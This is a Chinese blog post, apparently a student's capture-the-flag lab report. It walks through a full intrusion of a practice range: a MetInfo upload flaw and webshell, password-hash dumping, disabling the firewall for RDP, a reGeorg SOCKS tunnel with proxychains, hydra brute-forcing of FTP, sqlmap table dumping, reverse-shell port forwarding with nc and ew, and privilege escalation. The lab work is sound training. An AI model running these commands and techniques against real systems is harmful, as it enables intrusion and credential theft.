第二次靶场实验报告

最新推荐文章于 2022-11-09 23:24:42 发布
最新推荐文章于 2022-11-09 23:24:42 发布
阅读量493 收藏
点赞数
文章标签: 第二次靶场实验报告
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45477500/article/details/103245224
版权

实验
文章目录
实验
实验工具
搭建环境
实验要求
实验步骤
第一个Flag(文件上传漏洞)
第二个Flag(代理 hydra密码爆破)
第三个Flag(sql注入,端口转发,提权)
实验工具
VMware Workstation 15 Player
百度云链接提取码:0u6b

搭建环境
1.外网靶场 IP:192.168.100.130 NAT模式
2.调整物理机的网卡VMnet8的ipv4为192.168.100.1

实验要求
1.期间不允许使用虚拟机
2.在三个靶场中找出三个Flag

实验步骤
第一个Flag(文件上传漏洞)
打开网站之后发现是MetInfo v5.0.4版本的框架,知道相应版本的框架之后接下来的操作就是百度,看是否有出相应的漏洞。百度之后发现了有一出存在文件上传漏洞
漏洞位置:http://192.168.100.130/admin/include/uploadify.php
然后自己写一个html文件,代码如下

1 2 3 4 5 6 7 8 9 10 将已经写好的一句话木马,上传到网站目录中。

知道上传路径之后,就可以通过菜刀连接了,输入地址,密码为666,成功连接菜刀之后,打开虚拟终端输入whoami查看当前用户的权限。

当前已经是系统权限,所以不需要提权,获取到getshell之后,我们就要进一步的对主机进行渗透。
将QuarksPwDump.exe上传至C盘根目录下,通过命令行打开获取密码的哈希值

通过MD5解密,解密出密码为:a1b2c3
接下来通过命令netstat -ano查看3389端口是否开启,准备远程连接。

3389端口是开启状态,但是当远程连接的时候还是连接不上,此时说明有两方面的原因。
①防火墙是开启状态
②系统禁止远程登录连接
我们可以尝试关闭防火墙,输入命令net stop sharedaccess,再次远程连接时已经可以连接了。
输入账号administrator密码a1b2c3成功连接到主机

第一个Flag已经找到

第二个Flag(代理 hydra密码爆破)
桌面上并没有什么有价值的信息,接下来可以查看以下IE浏览器的历史纪录,历史记录的位置为C:\Documents and Settings\Administrator\Local Settings\History,通过查看历史记录,发现了两个有价值的IP地址,一个是10.200.1.15另一个是10.200.1.16
浏览器历史记录中有一条记录为:ftp:10.200.1.15,点开之后登录需要密码,已知用户名为admin

目标:hydra进行密码爆破。
首先将tunnel.nosocket.php文件上传服务器中,在物理机中打开文件,查看是否可用。

然后将reGeorgSocksProxy.py上传至kali中,输入python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocket.php运行文件

运行成功之后,设置代理,使用命令vi etc/proxychains.conf,打开文件之后,在文件的最底部,将socks4修改为socks5 127.0.0.1 8888并保存退出
输入命令proxychains hydra -l admin -P pass.txt ftp://10.200.1.15进行密码爆破

成功爆破密码,返回外网主机进行ftp登录
第二个Flag就在ftp文件夹下面

第三个Flag(sql注入,端口转发,提权)
打开ftp之后发现了网站目录,可以下载下来进行代码审计,在代码审计的过程中,发现了一处可能存在SQL注入的地方。
地址:http://10.200.1.16/message.php?id=1
通过简单的验证之后发现他是联合查询注入,显示位是2,然后就可以使用sqlmap
输入命令proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -D my_oa -T admin -C password,username --dump导出数据库中admin表中的用户及密码

找到登录密码之后直接登录OA系统
地址:http://10.200.1.16/admin/login.php
登录网站之后,发现一处存在任意文件上传漏洞,直接上传大马
地址:http://10.200.1.16/admin/userinfo.php
通过ftp找到文件上传的路径,在浏览器中打开。接下来进行反弹端口
接着,在物理机中使用nc.exe对5555端口进行监听,输入命令:nc.exe -lvvp 5555

然后将ew通过菜刀上传至外网主机中,然后进行端口转发,输入命令ew_for_Win.exe -s lcx_tran -l 4444 -f 192.168.100.1 -g 5555

然后打开大马,进行端口反弹

反弹成功,此时我的物理机已经进入到了IP为:10.200.1.16的命令行,通过whoami查看当前用户权限,需要提权

通过大马上传相应的exp
修改上传的exp的操作权限为777通过命令chomd 777 exp1

然后查看root目录下的文件找到第三个Flag

weixin_45477500
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
YXCMS靶场实验报告
LK20191121的博客
11-21 1426
这里自定义目录标题YXCNS靶场实验报告实验环境:实验信息:实验要求:靶场地址:操作流程欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文...
单机靶场练习(二)
kdhoi的博客
11-22 435
目录实验靶场练习需要工具搭建环境实验信息实验要求靶场网址实验步骤 实验靶场练习 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机的网卡为.NAT模式 2.调整物理机网卡vment8ip 为100网段 实验信息 ip地址为192.168.100.131 实验要求 在环境中找出3个flag 靶场网址 网址:https://pan.baidu.com/s/17...
第二次靶场实验笔记
hyy_ideal的博客
11-25 259
目录第二次实验靶场练习笔记实验要求实验环境实验开始文件上传漏洞爆破进入内网 第二次实验靶场练习笔记 实验要求 找出靶场中的3个flag 实验环境 靶机下载地址:https://pan.baidu.com/share/init?surl=xd8MdGwqZqErtvu0QO5d5A 提取码:xbb5 ( 注:win2003为外网可访问机器,linux为内网机器 ) 配置环境: 设置win...
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
Web漏洞分析(dvwa、SQL手工注入、sqlmap注入)
王陈锋的博客
11-07 3484
借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。1、操作系统:windows 7/8/10等2、开发环境:DVWA。
Sql-map测试报告
vsdfbhsdhsdfh的博客
09-30 756
sqlmap
第二次实验报告
y的博客
05-20 940
第二次实验报告HDFS 实验内容: 使用HDFS命令上传下载文件 编JAVA程序读、删除文件 实验步骤 (一)安装配置JDK+Eclipse+Maven 1.安装JDK→2.安装Eclipse→3.安装Maven→4. Eclipse里配置Maven (下载Windows版本,在Windows里安装使用。) 1.安装配置JDK ①官网下载Java开发工具安装包jdk-8u201-windows...
实验二报告
S200142的博客
11-09 1218
交通工程专业2019级曾培圣王世广汽车与交通工程学院2022年1月复杂网络导论家乡城市网络交通空间联系强度分析2021年12月——2022年1月熟悉交通网络的建模方式,认识家乡城市在地域中的交通地位及城市间联系。调研多模式(长途客运,普通铁路,高铁,城际公交等)客流的地域分布,尝试挖掘地域交通存在的问题并提出改善建议。可选一个省份内的所有地级市(数量不足时可考虑县级市)、家乡城市及相邻省份城市(不少于15个)进行分析。ArcGIS 10.5、Gephi、Python等。
网络攻防课程靶场实验报告
最新发布
05-14
所使用的靶场是红日靶场
CSRF漏洞的靶场实验
09-19
在“CSRF漏洞的靶场实验”中,我们将通过实际操作来理解这种攻击方式以及如何防御。 首先,我们需要了解CSRF攻击的基本原理。当用户访问一个网站并登录后,浏览器会保存一个叫做会话(Session)的状态,使得用户在...
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
web安全技术-实验二、web安全攻防靶场搭建.doc
08-20
web安全技术-实验二、web安全攻防靶场搭建
渗透测试-漏洞靶机
weixin_46162146的博客
01-15 5059
0X01 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs 0X02 xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:http://xss-quiz.int21h...
golang 对rdp的弱口令测试_某大学渗透测试实战靶场报告Part2
weixin_42361026的博客
12-06 1495
点击上方“蓝字”关注公众号获取最新信息!本文作者:久久久久久久、欧根亲王号、森浩、3had0w(贝塔安全实验室-核心成员)一、192.168.3.X段的信息搜集(1) 192.168.3.x段存活主机信息使用以前自己改的一个domain.bat批处理脚本或K8哥哥的Ladon得到192.168.3.x段存活主机如下,Ladon项目地址:https://github.com/k8gege/...
DC-1靶场渗透测试实验整理
u013930899的博客
09-10 2143
DC-1实验
网络渗透测试实验2实验报告
ColdMoon_Rain的博客
11-15 1774
@TOC 实验目的 1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。 2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。 3、能利用BrupSuite实现网站登录暴力破解获得登录密码。 4、能实现ZIP密码破解,理解安全密码的概念和设置。 环境 系统环境:Kali Linux 2
文件上传漏洞原理与实例测试
wuqiongrj的博客
07-22 1万+
0x00 什么是文件上传 为了让用户将文件上传到网站,就像是给危机服务器的恶意用户打开了另一扇门。即便如此,在今天的现代互联网的Web应用程序,它是一种常见的要求,因为它有助于提高业务效率。企业支持门户,给用户各企业员工有效地共享文件。允许用户上传图片,视频,头像和许多其他类型的文件。向用户提供的功能越多,Web应用受到攻击的风险和机会就越大,这种功能会被恶意用户利用,获
upload-labs靶场第二关
06-06
第二关的目标是上传一个图片文件,并成功绕过图片类型的检测,上传一个 PHP 木马文件。 步骤如下: 1. 点击页面上的上传按钮,选择一个图片文件并上传。 2. 拦截上传的请求,使用 Burp Suite 修改 Content-Type 为 image/png。 3. 将修改后的请求发送给服务器,上传成功后,会提示上传成功。 4. 访问上传的图片,会发现无法正常显示,这是因为我们修改了 Content-Type,使服务器将其当做 png 图片处理,而实际上是 PHP 代码,所以需要将图片后缀名改为 .php。 5. 访问上传的图片,触发服务器解析 PHP 代码,成功执行木马文件。 注意: 1. 需要在 php.ini 中打开 allow_url_include 选项,否则无法远程包含木马文件。 2. 在上传图片时,不要忘记在图片末尾添加 PHP 代码,否则无法执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值